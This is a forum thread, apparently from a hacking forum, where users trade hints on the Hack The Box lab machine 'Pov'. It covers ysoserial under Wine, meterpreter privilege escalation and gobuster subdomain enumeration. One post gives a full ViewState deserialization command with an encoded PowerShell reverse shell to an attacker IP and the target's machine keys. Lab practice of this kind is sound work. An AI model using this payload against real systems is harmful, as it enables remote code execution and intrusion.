Jan 28, 2024, 04:54 PM
Thanks for sharing hints !!!
|
Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
|
|
Jan 28, 2024, 05:13 PM
i did every think but didnt work how i can conncet >? i did encoded and decoed and every posible way
Jan 28, 2024, 05:27 PM
(This post was last modified: Jan 28, 2024, 05:28 PM by CubeMadness3.)
Anyone knows a alternative to ysoserial.exe for some reason my rusty 4ss machine doesn't work with it, what i mean by rusty 4ss is "Ivy Bridge" cpu it did not work with ysoserial.exe so i'm looking for alternative to do the same thing. Anyone?
Jan 28, 2024, 05:35 PM
Jan 28, 2024, 06:14 PM
HOW TO GET ROOT FLAG?
Jan 28, 2024, 07:31 PM
(Jan 28, 2024, 05:27 PM)CubeMadness3 Wrote: Anyone knows a alternative to ysoserial.exe for some reason my rusty 4ss machine doesn't work with it, what i mean by rusty 4ss is "Ivy Bridge" cpu it did not work with ysoserial.exe so i'm looking for alternative to do the same thing. Anyone? use WINE on linux i had a bitch of a time for 5 hours trying to use it one windows. flags as a virus first of all, then if you dont have OpenJDK / Java with fastJSON packages installed for dependancies, you're wasting your time. i dont know if the ysoserial linux version works from github here, because it does not list the VIEWSTATE param as a payload.. ysoserial.exe does, so just run it on wine. you dont even have to open the GUI, you can runt he simple command from CLI in linux, and it's pre-installed on kali... $ wine ysoserial.exe -p Viewstate -g TextFormattingRunProperties.. etc PoC: Test Case: #4 (because it's .NET >=4.5 on the machine server)
Jan 28, 2024, 08:21 PM
For administrator > take meterpreter session > try migrate any system process > will get NT Authority / System
Jan 28, 2024, 09:16 PM
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMC4xNC4xMTUnLDkwMDApOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCki" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
is this the right way to do this , im doing it on windows yet payload wont give a reverse shell
Jan 28, 2024, 09:43 PM
(Jan 28, 2024, 05:35 PM)youssefm55 Wrote:(Jan 27, 2024, 07:04 PM)DataNinja Wrote: dev.pov.htbhi sorry can I know how did you fuzz for that subdomain if I need it to be registered first in /etc/hosts file and I can find a DNS server to use as a resolver └─$ gobuster dns -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-5000.txt -d pov.htb =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Domain: pov.htb [+] Threads: 10 [+] Timeout: 1s [+] Wordlist: /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-5000.txt =============================================================== Starting gobuster in DNS enumeration mode =============================================================== Found: dev.pov.htb Progress: 4989 / 4990 (99.98%) =============================================================== Finished ===============================================================
Jan 29, 2024, 05:39 PM
(Jan 28, 2024, 09:43 PM)ggteaserjff Wrote:I dont know how that worked for you here's mine when I tried(Jan 28, 2024, 05:35 PM)youssefm55 Wrote:(Jan 27, 2024, 07:04 PM)DataNinja Wrote: dev.pov.htbhi sorry can I know how did you fuzz for that subdomain if I need it to be registered first in /etc/hosts file and I can find a DNS server to use as a resolver gobuster dns -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -d pov.htb =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Domain: pov.htb [+] Threads: 10 [+] Timeout: 1s [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt =============================================================== 2024/01/29 19:36:45 Starting gobuster in DNS enumeration mode =============================================================== Progress: 4989 / 4990 (99.98%) =============================================================== 2024/01/29 19:37:54 Finished =============================================================== I didnt eventually find it by using vhost mode and setting append domain to true |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 72 | 2,172 |
39 minutes ago Last Post: coolguyaroundyou |
||
| [FREE] HackTheBox Academy - CAPE Path Study | 43 | 4,216 |
1 hour ago Last Post: codexUltron |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 24 | 2,742 |
1 hour ago Last Post: codexUltron |
||
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 603 | 92,363 |
8 hours ago Last Post: 0xnany |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 374 | 93,326 |
8 hours ago Last Post: 0xnany |
||